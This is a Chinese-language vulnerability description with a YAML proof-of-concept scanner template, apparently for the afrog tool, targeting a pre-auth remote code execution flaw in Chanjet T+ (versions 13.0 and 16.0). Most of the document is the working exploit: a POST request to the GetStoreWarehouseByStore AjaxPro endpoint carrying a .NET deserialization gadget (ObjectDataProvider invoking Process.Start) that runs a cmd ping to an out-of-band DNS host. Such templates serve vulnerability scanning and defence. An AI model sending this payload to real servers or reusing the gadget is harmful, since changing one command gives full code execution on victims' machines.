漏洞描述
用友畅捷通Tplus存在前台远程代码执行漏洞,攻击者可利用GetStoreWarehouseByStore 方法注入序列化的payload,执行任意命令。最终造成服务器敏感性信息泄露或代码执行。
app="畅捷通-TPlus"
chanjet-tplus-rce: 畅捷通 T+ 远程命令执行
PoC代码[已公开]
id: chanjet-tplus-rce
info:
name: 畅捷通 T+ 远程命令执行
author: zan8in
severity: critical
verified: true
description: |
用友畅捷通Tplus存在前台远程代码执行漏洞,攻击者可利用GetStoreWarehouseByStore 方法注入序列化的payload,执行任意命令。最终造成服务器敏感性信息泄露或代码执行。
app="畅捷通-TPlus"
solutions: |
畅捷通Tplus 13.0
畅捷通Tplus 16.0
reference:
- https://mp.weixin.qq.com/s/RjzeOi4JLUL_djBOoQ2sJA
tags: chanjet,tplus,rce
created: 2023/07/08
set:
oob: oob()
oobDNS: oob.DNS
rules:
r0:
request:
method: POST
path: /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore
headers:
X-Ajaxpro-Method: GetStoreWarehouseByStore
body: |
{
"storeID":{
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
"MethodName":"Start",
"ObjectInstance":{
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"StartInfo":{
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"FileName":"cmd",
"Arguments":"/c ping {{oobDNS}}"
}
}
}
}
expression: oobCheck(oob, oob.ProtocolDNS, 3)
expression: r0()